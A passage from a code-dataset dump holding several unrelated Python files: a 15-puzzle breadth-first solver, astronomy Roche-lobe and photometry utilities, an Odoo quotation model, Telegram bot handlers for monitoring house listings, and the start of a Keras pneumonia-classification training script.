FUNCTIONS ==========================\r\ndef actionMoveLeft(mat, i, j):\r\n # moves the 0 tile left one\r\n dummyTile = mat[j][i-1] # store the state of the tile to the left of 0\r\n mat[j][i-1] = 0 # overwrite the left tile\r\n mat[j][i] = dummyTile # replace the 0 with the dummy tile\r\n return mat\r\n\r\n\r\ndef actionMoveRight(mat, i, j):\r\n # moves the 0 tile right one\r\n dummyTile = mat[j][i+1] # store the state of the tile to the right of 0\r\n mat[j][i+1] = 0 # overwrite the right tile\r\n mat[j][i] = dummyTile # replace the 0 with the dummy tile\r\n return mat\r\n\r\n\r\ndef actionMoveUp(mat, i, j):\r\n # moves the 0 tile up one\r\n dummyTile = mat[j-1][i] # store the state of the tile to the up of 0\r\n mat[j-1][i] = 0 # overwrite the up tile\r\n mat[j][i] = dummyTile # replace the 0 with the dummy tile\r\n return mat\r\n\r\n\r\ndef actionMoveDown(mat, i, j):\r\n # moves the 0 tile up one\r\n dummyTile = mat[j+1][i] # store the state of the tile to the up of 0\r\n mat[j+1][i] = 0 # overwrite the up tile\r\n mat[j][i] = dummyTile # replace the 0 with the dummy tile\r\n return mat\r\n\r\n\r\n# ============================== MAIN =================================\r\n# define initial state\r\ninitialState = np.array([[1, 6, 2, 3], [9,5, 7, 4], [0, 10, 11, 8] , [13, 14, 15, 12]])\r\ntestCase = 5 # test case number changes output .txt file name\r\n\r\n# define goal state\r\ngoalState = np.array([[1, 2, 3, 4],\r\n [5, 6, 7, 8],\r\n [9, 10, 11, 12],\r\n [13, 14, 15, 0]])\r\ngoalString = matToStr(goalState) # get the string version of the goal matrix\r\n\r\n# create empty nodes array\r\nnodes = [] # each element of the nodes array takes the form: [index of parent, current state string, prev move]\r\n# prev move element takes the form: 'U', 'D', 'L', 'R'\r\n\r\n# add the initial state to the nodes array\r\nnodes.append(['Start', matToStr(initialState), 'N/A'])\r\n# first element is the only one to get a str type parent index and 0 prev move elem\r\n\r\n# remember the index of the first and last state in nodes for the previous layer\r\n# so that you know where to start iterating for the next layer\r\n# Example:\r\n# 0\r\n# 1 2\r\n# 3 4 5 6\r\n# 7 8 9 10 11 12 13 14\r\n# by this point, 7 and 14 would be remembered so that the loop knows to start the next layer from 7 to 14\r\nlayerStartIndex = 0\r\nlayerEndIndex = 0\r\n\r\nfailedMessage = ''\r\n\r\n# keep looping until goalState is found\r\ngoalFound = False\r\nlayer = 0\r\nwhile not goalFound:\r\n # loop through each state from the previous layer\r\n layer += 1\r\n # print('Layer', layer)\r\n for n in range(layerStartIndex, layerEndIndex + 1):\r\n currentString = nodes[n][1] # get the current state string\r\n currentMat = strToMat(currentString) # convert string state to matrix state\r\n i, j = findZero(currentMat) # get the location of the 0, store it in i, j\r\n dirs = getPossibleMoves(i, j, nodes[n][2]) # [Up, Down, Left, Right] with bool\r\n \r\n if dirs[0]: # if possible, move up\r\n childState = actionMoveUp(np.copy(currentMat), i, j) # move up and store new state\r\n childString = matToStr(childState) # get string version of child state\r\n dup = checkIfDuplicate(childString) # check if the new state is a duplicate state\r\n if dup == False:\r\n nodes.append([n, childString, 'U']) # add new state and its parent to nodes list\r\n if np.array_equal(childString, goalString): # check if the child reached the goal\r\n goalFound = True # exit the for loop and stop while loop\r\n break\r\n \r\n if dirs[1]: # if possible, move down\r\n childState = actionMoveDown(np.copy(currentMat), i, j) # move down and store new state\r\n childString = matToStr(childState) # get string version of child state\r\n dup = checkIfDuplicate(childString) # check if the new state is a duplicate state\r\n if dup == False:\r\n nodes.append([n, childString, 'D']) # add new state and its parent to nodes list\r\n if np.array_equal(childString, goalString): # check if the child reached the goal\r\n goalFound = True # exit the for loop and stop while loop\r\n break\r\n \r\n if dirs[2]: # if possible, move left\r\n childState = actionMoveLeft(np.copy(currentMat), i, j) # move left and store new state\r\n childString = matToStr(childState) # get string version of child state\r\n dup = checkIfDuplicate(childString) # check if the new state is a duplicate state\r\n if dup == False:\r\n nodes.append([n, childString, 'L']) # add new state and its parent to nodes list\r\n if np.array_equal(childString, goalString): # check if the child reached the goal\r\n goalFound = True # exit the for loop and stop while loop\r\n break\r\n \r\n if dirs[3]: # if possible, move right\r\n childState = actionMoveRight(np.copy(currentMat), i, j) # move right and store new state\r\n childString = matToStr(childState) # get string version of child state\r\n dup = checkIfDuplicate(childString) # check if the new state is a duplicate state\r\n if dup == False:\r\n nodes.append([n, childString, 'R']) # add new state and its parent to nodes list\r\n if np.array_equal(childString, goalString): # check if the child reached the goal\r\n goalFound = True # exit the for loop and stop while loop\r\n break\r\n \r\n # update the start and end indexes for use in the next layer\r\n layerStartIndex = layerEndIndex\r\n if n == layerEndIndex:\r\n layerEndIndex = len(nodes)-1\r\n \r\n # stop the program after 1,000,000 nodes searched\r\n if len(nodes) > 1000000:\r\n goalFound = True\r\n print(\"Search Failed\")\r\n break\r\n if len(nodes) > 1000000:\r\n break\r\n \r\n# exited while loop\r\n \r\nindexes = [len(nodes) - 1] # create array to hold indexes. start with last elem in nodes\r\nmoves = [] # create array to hold moves toward solution\r\n\r\n# get indices and moves list of parents of solution\r\nwhile nodes[indexes[-1]][0] != 'Start': # go until you get back to start\r\n moves.append(nodes[indexes[-1]][2]) \r\n indexes.append(nodes[indexes[-1]][0])\r\n\r\n# reverse order of indexes and moves: now it goes from initial to goal\r\nindexes.reverse()\r\nmoves.reverse()\r\n\r\n# write solution to text file titled with initial state\r\nf = open(\"nodePath_TestCase\" + str(testCase),\"w+\") # create .txt file\r\nfor n, i in enumerate(indexes): # loop through list of solution indexes\r\n strg = strToMat(nodes[i][1]) # get the matrix state at a position\r\n strg = np.reshape(strg, (1,16), order='F').tolist()[0] # convert matrix to be columwise then to list\r\n strg = ' '.join([str(elem) for elem in strg]) \r\n # add the info to the .txt file\r\n f.write(strg + '\\r\\n')\r\nprint('New file created: nodePath_TestCase' + str(testCase) + '.txt')\r\nf.close() \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"alecLahr/15PuzzleProblem","sub_path":"Project_1.py","file_name":"Project_1.py","file_ext":"py","file_size_in_byte":9305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8603326753","text":"import numpy as np\n# photutils 1.0.1\n\n\n\n\nclass VelSpace():\n def __init__(self,q, K2):\n if q <= 0:\n return(\"ERROR: q = m2/m1 = \" +str(q) + \" <= 0\")\n \n self.q = q\n self.K2 = K2\n \n # =============================================================================\n # Funciones auxilares \n # =============================================================================\n \n def xl1(self): \n \"\"\" Returns the distance of the L1 point from star 1 scaled by the orbital separation.\n Param q mass ratio = m2/m1.\n \"\"\"\n import numpy as np\n q = self.q\n \n \n NMAX = 1000 # Maximun of iteration\n EPS = 1e-12 #\n \n # Coefficients definition:\n mu = q/(1+q)\n \n a1 = -1+mu; a2 = 2-2*mu; a3 = -1+mu; a4 = 1+2*mu; a5 = -2-mu; a6 = 1\n \n d1 = 1*a2; d2 = 2*a3; d3 = 3*a4; d4 = 4*a5; d5 = 5*a6\n \n # Iteration\n n = 0\n xold = 0\n x = 1/(1+ q)\n \n while n < NMAX and np.abs(x-xold) > EPS*np.abs(x):\n xold = x\n f = x*(x*(x*(x*(x*a6+a5)+a4)+a3)+a2)+a1\n df = x*(x*(x*(x*d5+d4)+d3)+d2)+d1\n x -= f/df\n n+=1\n \n if(n == NMAX):\n return(\"Error: exceeded maximum iterations\")\n \n return x\n \n def rpot(self,x,y,z):\n import numpy as np\n q = self.q\n \n \"\"\" Computes the Roche potential at a given point. T\n his is for the standard synchronised Roche geometry\n q mass ratio = M2/M1 \n x,y,z the the poit coord in units scaled by separation\n \"\"\"\n mu = q/(1+q)\n comp = 1-mu\n x2y2 = x**2 + y**2\n z2 = z**2\n r1sq = x2y2+z2 \n r1 = np.sqrt(r1sq)\n r2 = np.sqrt(r1sq + 1 - 2*x)\n \n return (-comp/r1-mu/r2-(x2y2+mu*(mu-2*x))/2)\n \n\n #==============================================================================\n # Roche Lobe\n #==============================================================================\n \n def lobe(self,lobe_n, n=100):\n \"\"\" lobe2 returns arrays x and y for plotting an equatorial\n section of the Roche lobe of the secondary star in a binary of mass\n ratio q = M2/M1. The arrays start and end at the inner lagrangian\n point and march around uniformly in azimuth looking from the centre of\n mass of the primary star. n is the number of points and must be at\n least 3.\n Parama:\n\n n number of x and y values\n \n \"\"\"\n \n import numpy as np\n \n xl1 = self.xl1\n rpot = np.vectorize(self.rpot)\n \n \n if n < 3:\n return(\"ERROR: n = \" +str(n) + \" < 3\")\n\n # Esta constante se usa mas adelante cuando se buscan las raices: minimum accuracy in returned root\n FRAC = 1e-6\n \n # Compute L1 point and critical potential there.\n \n rl1 = xl1()\n cpot = rpot(rl1,0,0)\n \n # Indice que varia segun el lobulo que estemos intando\n l={}; l[1]=[1,rl1,0]; l[2]=[-1,1-rl1,1]\n \n \n # Now compute Roche lobe in n regular steps of angle looking from centre of Roche lobe (i.e. L1)\n x=np.zeros(n)\n y=np.zeros(n)\n \n for i in range(n):\n # L1 point is a special case because derivative becomes zero there. lambda is set so that after i=0, there is a decent starting multiplier.\n if i ==0 or i==n-1:\n x[i] = rl1\n y[i] = 0\n else:\n theta = 2*np.pi*i/(n-1)\n dx = l[lobe_n][0] * np.cos(theta)\n dy = np.sin(theta)\n \n upper = l[lobe_n][1]\n lower = upper/4\n \n steps=101\n res=1\n while res > FRAC:\n r=np.linspace(lower,upper,steps)\n x0 = l[lobe_n][2] + r * dx\n y0 = r*dy\n rpot0=rpot(x0,y0,0)\n res=np.abs(rpot0-cpot).min()\n index=np.abs(rpot0-cpot).argmin()\n upper=r[index+1]\n lower=r[index-1] \n \n x[i] = l[lobe_n][2] + r[index]*dx\n y[i] = r[index] * dy\n \n return x,y\n \n \n def vlobe(self,lobe_n, n=100):\n \"\"\"vlob2 computes secondary's Roche lobe in velocity coordinates returns arrays vx and vy for plotting an equatorial section\n of the Roche lobe of the secondary star in a binary of mass ratio q = M2/M1\n in Doppler coordinates. The arrays start and end at the inner Lagrangian \n point and march around uniformly in azimuth looking from the centre of \n mass of the primary star. n is the number of points and must be at least 3\"\"\"\n \n q = self.q\n K2 = self.K2\n lobe = self.lobe\n \n # Call lobe2 then transform appropriately\n x,y=lobe(lobe_n,n)\n \n mu = q/(1+q)\n \n tvx = K2*(q+1)*(- y)\n tvy = K2*(q+1)*(x - mu)\n \n return tvx,tvy\n \n \n #==============================================================================\n # Gas stream \n #==============================================================================\n \n def strinit(self):\n \"\"\" strinit sets a particle just inside the L1 point with the correct velocity as given in Lubow and Shu.\n Params:\n q mass ratio = M2/M1\n r start position returned\n v start velocity returned \"\"\"\n import numpy as np\n q = self.q\n \n SMALL = 1.e-5\n rl1 = self.xl1()\n mu = q/(1+q)\n a = (1-mu)/rl1**3+mu/(1-rl1)**3\n lambda1 = np.sqrt(((a-2) + np.sqrt(a*(9*a-8)))/2)\n m1 = (lambda1*lambda1-2*a-1)/2/lambda1\n \n r = np.array([rl1-SMALL,-m1*SMALL,0])\n v = np.array([-lambda1*SMALL,-lambda1*m1*SMALL,0])\n return r, v\n \n \n def vtrans(self, t_type, x, y, vx, vy):\n \"\"\" vtrans computes two velocity transforms, (1) a straight transform from rotating to inertial frame and \n (2) an inertial frame velocity in the disc.\"\"\"\n import numpy as np\n # type: 1 for rotating - > inertial, 2 for position to disc, 3 for rotating.\n # x: x position (units of separation)\n # y: y position (units of separation)\n # vx: x velocity (omega*a = 1 units)\n # vy: y velocity (omega*a = 1 units)\n\n #\n # When translating to inertial, the accretor velocity is added. If you want the velocity relative to this you must add mu = q/(1+q) to tvy before using it.\n q = self.q\n mu = q/(1+q)\n \n if t_type == 1:\n tvx = vx - y\n tvy = vy + x - mu\n elif t_type == 2:\n rad = np.sqrt(x*x + y*y)\n vkep = 1/np.sqrt((1+q)*rad)\n tvx = -vkep*y/rad\n tvy = vkep*x/rad-mu\n elif t_type == 3:\n tvx = vx\n tvy = vy\n else:\n print(\"Error in vtrans: did not recognize type = \" +str(t_type) + \". Only 1, 2, or 3 supported.\");\n \n return tvx, tvy\n \n \n def rocacc(self,rx,ry,rz,vx,vy,vz):\n \"\"\" rocacc calculates and returns the acceleration (in the rotating frame) in a Roche potential of a particle of given position and velocity.\n Params:\n q mass ratio = M2/M1\n r position, scaled in units of separation.\n v velocity, scaled in units of separation. \"\"\"\n import numpy as np\n q = self.q\n\n f1 = 1/(1+q)\n f2 = f1*q\n yzsq = np.square(ry) + np.square(rz)\n r1sq = np.square(rx) + yzsq\n r2sq = np.square(rx-1) + yzsq\n fm1 = f1/(r1sq*np.sqrt(r1sq))\n fm2 = f2/(r2sq*np.sqrt(r2sq))\n fm3 = fm1+fm2;\n \n tmpx = -fm3*rx + fm2 + 2*vy + rx - f2\n tmpy = -fm3*ry - 2*vx + ry\n tmpz = -fm3*rz\n \n return np.array([tmpx,tmpy,tmpz])\n \n \n def vstream(self,step,n,t_type=1):\n # Vector donse se almacenaran las velocidades calculadas\n import numpy as np\n\n strinit = self.strinit\n rocacc = self.rocacc\n vtrans = self.vtrans\n \n q = self.q\n K2 = self.K2\n \n x = np.zeros(n)\n y = np.zeros(n)\n vx = np.zeros(n)\n vy = np.zeros(n)\n \n \n #==============================================================================\n # 1er punto: L1\n #==============================================================================\n # Posicion de L1 con velocidad inicial 0\n x[0] = self.xl1()\n y[0] = 0\n vx[0] = 0\n vy[0] = 0\n \n # vx[0],vy[0] = vtrans(q,1, x[0], y[0], 0, 0)\n \n #==============================================================================\n # 2do punto dentro de L1 (Lubow and Shu) \n #==============================================================================\n x[1] = strinit()[0][0]\n y[1] = strinit()[0][1] \n vx[1] = strinit()[1][0]\n vy[1] = strinit()[1][1]\n \n #==============================================================================\n # Bucle para calcular la aceleracion en cada paso \n #==============================================================================\n s = np.arange(n-2)+1\n \n for i in s:\n # Aceleracion\n a = rocacc(x[i], y[i], 0, vx[i], vy[i], 0)\n \n # Posiciones\n x[i+1] = x[i]+ vx[i]*step + 0.5*a[0]*np.square(step)\n y[i+1] = y[i]+ vy[i]*step + 0.5*a[1]*np.square(step)\n # Velocidades\n vx[i+1] = vx[i] + a[0]*step\n vy[i+1] = vy[i] + a[1]*step\n \n return K2*(q+1)*np.float_(vtrans(t_type,x,y,vx,vy))\n \n\n\n\n\n\n# =============================================================================\n# Algoritmos de centrado \n# =============================================================================\ndef Centroid(data,coords,size=7,method='1dg',mask=None):\n \"\"\"\n Entrada: imagen, lista de coordenadas. Busca el centroide en una region de radio \"r\" entorno a la posicion dada en \"coords\".\n Salida: array con las posisiones ajustadas y distancia entre las posisiones \"d\"\n\n Parameters\n ----------\n data : TYPE\n DESCRIPTION.\n \n coords : numpy array\n n coordinates in a (n,2) numpy array.\n \n size : number, optional\n Size in pixels of the section containing the start where perform the centroid. The default is 3.\n \n method : photutils.centroid\n com: Calculates the object “center of mass” from 2D image moments.\n quadratic: Calculates the centroid by fitting a 2D quadratic polynomial to the data.\n 1dg: Calculates the centroid by fitting 1D Gaussians to the marginal x and y distributions of the data.\n 2dg: Calculates the centroid by fitting a 2D Gaussian to the 2D distribution of the data.\n\n Returns\n -------\n None.\n\n \"\"\" \n \n # =============================================================================\n # Paquetes utilizados \n # =============================================================================\n from photutils.centroids import centroid_com, centroid_quadratic,centroid_1dg, centroid_2dg\n from astropy.nddata.utils import Cutout2D\n from astropy.stats import sigma_clipped_stats\n \n # Diccionario con los distintos metodos de centrados \n cent = {'com': centroid_com, 'quadratic': centroid_quadratic, '1dg': centroid_1dg, '2dg':centroid_2dg}\n \n # Vamos a definir una seccion de los datos\n cut = Cutout2D(data, coords, size=size)\n sec = cut.data\n \n #Calculamos el cielo solo dentro de la dregion selectionada y lo restamos \n median = sigma_clipped_stats(sec, sigma=3.0)[1]\n sec = sec - median\n \n x_s, y_s = cent[method](sec, mask=mask)\n \n fit_coords = cut.to_original_position([x_s, y_s])\n \n \n return fit_coords\n\n# =============================================================================\n# Seleccion manual de coordenadas\n# =============================================================================\ndef InteractiveCentroid(data,n_points, size=7, method='1dg', mask=None, cmap='Greys',p_min=5,p_max=95):\n \"\"\" Definicion\n \"\"\"\n import numpy as np\n import tkinter\n import matplotlib\n matplotlib.use('TKAgg')\n import matplotlib.pyplot as plt\n from tkinter import messagebox #tkinter.TkVersion 8.6 \n\n # limites del contraste \n vmin = np.percentile(data,p_min)\n vmax = np.percentile(data,p_max)\n \n # Equiquetas para las estrellas\n label=['Obj','Comp1','Comp2','Comp3','Comp4','Comp5','Comp6','Comp7','Comp8','Comp9']\n\n \n plt.close('all') \n plt.ion(),plt.show()\n plt.figure(1,figsize=(7,7))\n\n happy = False\n centroid = []\n while happy == False:\n plt.cla()\n plt.title('Select Object first then '+str(n_points-1)+' comparison stars')\n plt.imshow(data,origin='lower',cmap=cmap, aspect='equal',vmin=vmin,vmax=vmax)\n plt.tight_layout()\n plt.show()\n\n\n # Coger puntos de manera interactiva\n point = plt.ginput(n=n_points,timeout=0,show_clicks=True,)\n \n coords = point\n\n # =============================================================================\n # Centrado\n # =============================================================================\n for coord in coords:\n ind = coords.index(coord)\n \n cent = Centroid(data,coord,size=size,method=method,mask=mask)\n centroid.append(cent)\n \n # Posiciones del cursor\n # plt.scatter(coord[0],coord[1],marker='+',color='b',zorder=2,alpha=0.3)\n # Posiciones ajustadas\n plt.scatter(cent[0],cent[1],marker='+',color='C3')\n plt.scatter(cent[0],cent[1], s=80, facecolors='none', edgecolors='C3',zorder=1)\n\n plt.annotate(label[ind],coord, xytext=(8, 8), textcoords='offset points',color='C3',size=15)#, weight='bold')\n\n plt.show()\n\n\n happy = messagebox.askyesno(\"\",\"Are you happpy with the result?\")\n plt.close(1)\n\n \n return coords \n \n\n# =============================================================================\n# Seccion de los datos del tamano de la apertura \n# =============================================================================\ndef SecImData(ap, data, method, subpixels=None):\n mask=ap.to_mask(method=method,subpixels=subpixels)\n mask_data=mask.data\n sec=mask.cutout(data)\n sec_weight=sec*mask_data\n sec_data = sec_weight[mask_data>0]\n # Quitamos los valores NaN\n sec_data = sec_data[np.isfinite(sec_data)]\n \n return sec_data\n\n\n\nclass AnnSky:\n \n def __init__(self,data, coord, r_in, r_out, method, subpixels=None):\n from photutils import CircularAnnulus\n\n self.ap = CircularAnnulus(coord, r_in=r_in, r_out=r_out)\n \n self.sec_data = SecImData(self.ap, data, method=method, subpixels=subpixels)\n # media sigma clip\n \n def stat(self, sigma_clip):\n from astropy.stats import sigma_clipped_stats \n mean, median, stddev = sigma_clipped_stats(self.sec_data, sigma=sigma_clip)\n \n return mean, median, stddev\n \n def plot(self, color= 'C0', ls='solid',lw=1):\n self.ap.plot(color=color, ls =ls,lw=lw)\n\n\n\ndef FWHM(data,xc,yc):\n from astropy.modeling.models import Gaussian2D\n from astropy.modeling.models import Moffat2D\n from astropy.modeling.models import Const2D\n from astropy.modeling.models import Polynomial2D\n from astropy.modeling.fitting import LevMarLSQFitter\n\n # Data:\n x, y = np.mgrid[:data.shape[0], :data.shape[1]]\n \n # Model:\n cte0 = 0.06\n Cte = Polynomial2D(degree=1)\n \n # Model:\n cte0 = 0.06\n Cte = Const2D(cte0)\n\n \n Moff = Moffat2D(amplitude=1, x_0=xc, y_0=yc, gamma=20, alpha=2)\n \n \"\"\" \n Gauss = Gaussian2D(amplitude=data[int(yc),int(xc)]/2, x_mean=xc, y_mean=yc,x_stddev=1,y_stddev=1)\n # Parametros fijos\n Gauss.x_mean.fixed = True\n Gauss.y_mean.fixed = True\n Gauss.theta.fixed = True\n model = Gauss + Cte\n\n \"\"\"\n\n model = Moff + Cte\n \"\"\"\n # Parametros ligados: imponemos que sea una gaussiana redonda\n def tie(model):\n return model.y_stddev_0\n \n model.x_stddev_0.tied = tie\n \"\"\"\n \n # Fit\n fitter = LevMarLSQFitter()\n import warnings\n with warnings.catch_warnings():\n # Ignore model linearity warning from the fitter\n warnings.simplefilter('ignore')\n fit = fitter(model, x, y, data)\n gamma = fit.gamma_0\n alpha = fit.alpha_0\n \n FWHM = 2. * gamma * np.sqrt(2 ** (1/alpha) -1) #fit.x_stddev_0.value\n \n #FWHM = 2.3548 * sigma\n \n return FWHM, fit\n\n\n\ndef Seeing(data, r = 11):\n \n from astropy.stats import sigma_clipped_stats\n from photutils.detection import DAOStarFinder \n from astropy.nddata.utils import Cutout2D\n\n # Source detection\n\n mean, median, std = sigma_clipped_stats(data, sigma=3) \n\n starfind = DAOStarFinder(fwhm=4.0, threshold=5.*std, exclude_border=True, sky=median) \n sources = starfind(data-median) \n\n x = sources['xcentroid'] \n y = sources['ycentroid']\n \n # FWHM over all the detected sources\n fwhm = []\n for i in range(len(x)): \n cut = Cutout2D(data, [x[i],y[i]], r, mode='partial')\n sec = cut.data\n xc , yc = cut.to_cutout_position([x[i],y[i]])\n fwhm.append(FWHM(sec,xc,yc))\n \n return np.array(fwhm)\n\n\n\"\"\"\n\n # Magnitud fumental\n # Asignamos el mismo zeropoint que iraf\n \n inst_mag = -2.5*np.log10((phot_table['aperture_sum'] - bkg_sum)/exptime[i])\n \n # Errores segun los calcula IRAF\n\n flux = phot_table['aperture_sum'] - bkg_sum # cuentas debidas solo a la senal\n epadu = gain[i] # ganancia\n \n area = aperture.area\n stdev = bkg_std # desviacion estandard del cielo\n nsky = annulus_apertures.area\n error = np.sqrt(flux/epadu + area*stdev**2 + area**2*stdev**2/nsky)\n merr.append(1.0857*error/flux) \n\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"felipeji/fji","sub_path":"fji/fji.py","file_name":"fji.py","file_ext":"py","file_size_in_byte":18564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38621857318","text":"from odoo import api, fields, models\n\n\nclass ServiceQuotationFixItemPaymentTermDetail(models.Model):\n _name = \"service.quotation_fix_item_payment_term_detail\"\n _description = \"Service Fix Item Payment Term Detail\"\n _inherit = [\n \"service.fix_item_payment_term_detail_mixin\",\n ]\n\n sequence = fields.Integer(\n string=\"Sequence\",\n required=True,\n default=5,\n )\n term_id = fields.Many2one(\n string=\"Service Payment Term\",\n comodel_name=\"service.quotation_fix_item_payment_term\",\n ondelete=\"cascade\",\n )\n pricelist_id = fields.Many2one(\n string=\"Pricelist\",\n comodel_name=\"product.pricelist\",\n related=\"term_id.service_id.pricelist_id\",\n store=True,\n )\n\n @api.onchange(\n \"currency_id\",\n )\n def onchange_pricelist_id(self):\n pass\n\n def _prepare_contract_data(self):\n self.ensure_one()\n return {\n \"name\": self.name,\n \"product_id\": self.product_id.id and self.product_id.id or False,\n \"account_id\": self.account_id.id,\n \"analytic_account_id\": self.analytic_account_id\n and self.analytic_account_id.id\n or False,\n \"price_unit\": self.price_unit,\n \"uom_quantity\": self.uom_quantity,\n \"uom_id\": self.uom_id.id,\n \"tax_ids\": [(6, 0, self.tax_ids.ids)],\n \"pricelist_id\": self.pricelist_id.id,\n \"currency_id\": self.currency_id.id,\n }\n","repo_name":"open-synergy/opnsynid-service","sub_path":"ssi_service_quotation/models/service_quotation_fix_item_payment_term_detail.py","file_name":"service_quotation_fix_item_payment_term_detail.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6822033072","text":"from telegram import Update, ReplyKeyboardRemove, InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext import ConversationHandler, CallbackContext\n\nfrom costants import WatchType, ADMIN_ID\nfrom models.report import Report\nfrom models.user import User\nfrom services.storage import storage\n\n\nasync def start(update: Update, context: CallbackContext) -> int:\n current_user: User = storage.retrieve_user(update.effective_user.id, update.effective_user.username, update.effective_user.first_name, update.effective_user.last_name)\n if context.args and context.args[0] and context.args[0] != current_user.chat_id:\n for user in storage.load():\n if str(user.chat_id) == context.args[0]:\n user.add_follower(str(current_user.chat_id))\n storage.save()\n text = f'Ciao! Sei ora follower di {user.username} e riceverai anche i suoi annunci.'\n await update.message.reply_text(text)\n return ConversationHandler.END\n text = 'Ciao! Ti aiuterò con il monitoraggio di annunci di case. ' \\\n 'Prova a utilizzare i comandi della lista o invia direttamente qui il link di ' \\\n 'una ricerca su un sito di annunci per iniziare. Per info ' \\\n 'consulta la sezione /info.'\n await update.message.reply_text(text)\n return ConversationHandler.END\n\n\nasync def cancel(update: Update, context: CallbackContext) -> int:\n context.chat_data.clear()\n text = 'Operazioni in corso annullate.'\n await update.message.reply_text(text, reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n\nasync def default(update: Update, context: CallbackContext) -> int:\n text = 'Comando non riconosciuto o url non inviato correttamente. ' \\\n 'Prova a utilizzare i comandi della lista o ad inviare l\\'url di una ricerca su un sito di annunci.'\n await update.message.reply_text(text)\n return ConversationHandler.END\n\n\nasync def report(update: Update, context: CallbackContext) -> int:\n query = update.callback_query\n users = storage.load()\n report_data: Report = storage.load_report()\n\n n_users = len(users)\n if n_users > 0:\n counter = [0] * len(WatchType)\n attempts = [0] * len(WatchType)\n status = [True] * len(WatchType)\n total = 0\n per_user_refresh_rate = max(10, int(60 / n_users))\n for user in users:\n for watch in user.watchlist:\n for i, watch_name in enumerate(WatchType):\n if watch_name.value == watch.display_name:\n attempts[i] = max(attempts[i], watch.attempts)\n if watch.status:\n counter[i] += 1\n total += 1\n else:\n status[i] = False\n text = f'*Report dal {report_data.starting_time}*\\n\\n' \\\n f'Utenti: {n_users}\\n'\n resolve_buttons = [\n [\n InlineKeyboardButton(text=f'Azzera statistiche',\n callback_data=\"RESTART_REPORT\")\n ]\n ]\n for i, watch_name in enumerate(WatchType):\n text += f'\\n*{watch_name.value}*\\n'\n text += 'Stato: `OK`\\n' if status[i] else 'Stato: *KO*\\n'\n text += f'Chiamate: {int(counter[i] * (60 / per_user_refresh_rate))} ogni ora\\n'\n text += f'Massimi tentativi: {int(attempts[i])}\\n'\n text += f'Notifiche: {report_data.ads_sent[i]}\\n' if report_data.ads_sent[i] else 'Notifiche: /\\n'\n text += f'Aggiornamento: {report_data.last_update[i]}\\n' if report_data.last_update[i] else 'Aggiornamento: /\\n'\n if not status[i]:\n resolve_buttons.append(\n [\n InlineKeyboardButton(text=f'Riavvia {watch_name.value}',\n callback_data=\"RESTART_WATCH \" + str(i))\n ]\n )\n reply_markup = InlineKeyboardMarkup(inline_keyboard=resolve_buttons)\n if query:\n await query.answer()\n await query.edit_message_text(text, parse_mode='MarkdownV2', disable_web_page_preview=True,\n reply_markup=reply_markup)\n else:\n await update.message.reply_markdown_v2(text, disable_web_page_preview=True, reply_markup=reply_markup)\n return ConversationHandler.END\n else:\n await update.message.reply_text('Non ci sono ancora informazioni da visualizzare.')\n return ConversationHandler.END\n\n\nasync def info(update: Update, context: CallbackContext) -> int:\n text = 'Questo bot è stato creato con l\\'intento di aiutare chi come me è alla ricerca ' \\\n 'di una casa\\\\. Spero che possa semplificare la vostra ricerca\\\\. Sarò lieto di ricevere ' \\\n f'vostri feedback o richieste di assistenza\\\\. Buona fortuna\\\\!\\n\\n[Contattami](tg://user?id={ADMIN_ID})'\n await update.message.reply_markdown_v2(text)\n return ConversationHandler.END\n\n\nasync def restart_watch(update: Update, context: CallbackContext) -> int:\n query = update.callback_query\n if query:\n index = int(query.data.split()[1])\n for user in storage.load():\n for watch in user.watchlist:\n for i, watch_name in enumerate(WatchType):\n if watch_name.value == watch.display_name and i == index:\n watch.status = True\n storage.save()\n return await report(update, context)\n else:\n await update.message.reply_text('Si è verificato un errore.')\n return ConversationHandler.END\n\n\nasync def restart_report(update: Update, context: CallbackContext) -> int:\n query = update.callback_query\n if query:\n storage.restart_report()\n return await report(update, context)\n else:\n await update.message.reply_text('Si è verificato un errore.')\n return ConversationHandler.END\n","repo_name":"ammiratafabiano/loft-finder","sub_path":"actions/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31972704559","text":"\"\"\"\nWritten by Jiawei Zhao on 12th of December, 2022 to implemented customized Keras layers \n\"\"\"\n\n#Specifying the image\nImage_Width=224\nImage_Height=224\nBatch_Size = 32\nImage_Size=(Image_Width,Image_Height)\nImage_Channels=3\nHistory_Path = \"../self_CNN_training_history.json\"\nModel_Path = \"../pneumonia_aug_self_CNN.h5\"\n\nimport json\nimport os\nfrom typing import *\nfrom customized_layers import *\nfrom pandas import read_csv\nimport numpy as np\nimport cv2\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom statistics import mean\nfrom keras.models import Sequential, save_model, load_model\nimport tensorflow as tf\nimport keras\nimport keras.backend as K \nfrom keras.optimizers import Adam\nfrom model import create_self_CNN_Model\n\n\n\"\"\"\nMethod for loading train images and test images from disk storage into a \n\"tf.keras.preprocessing.image.DirectoryIterator\" rtype\nand\n\"tf.keras.preprocessing.image.NumpyArrayIterator\" rtype\nrespectively\n\"\"\"\ndef process_input_data(\n input_path:str=\"\", \n img_width:int=Image_Width, img_height:int=Image_Height, img_channels:int=Image_Channels,\n batch_size:int=Batch_Size\n) -> Tuple[any]:\n \n # input parameter assertions\n assert img_width >= 16 and img_height>=16\n assert img_channels in {1, 3, 4}\n assert 16<=batch_size<=256\n \n # ImageDataGenerator objects\n train_datagen = ImageDataGenerator(\n rescale=1./255, \n rotation_range=45, fill_mode='nearest', \n brightness_range = (0.8, 1.25),\n zoom_range= (0.8, 1.25),\n width_shift_range=0.2, height_shift_range=0.2,\n channel_shift_range=50\n )\n \n # only rescaling\n test_datagen = ImageDataGenerator(rescale=1./255)\n \n # This is fed to the network in the specified batch sizes and image dimensions\n train_iterator = train_datagen.flow_from_directory(\n 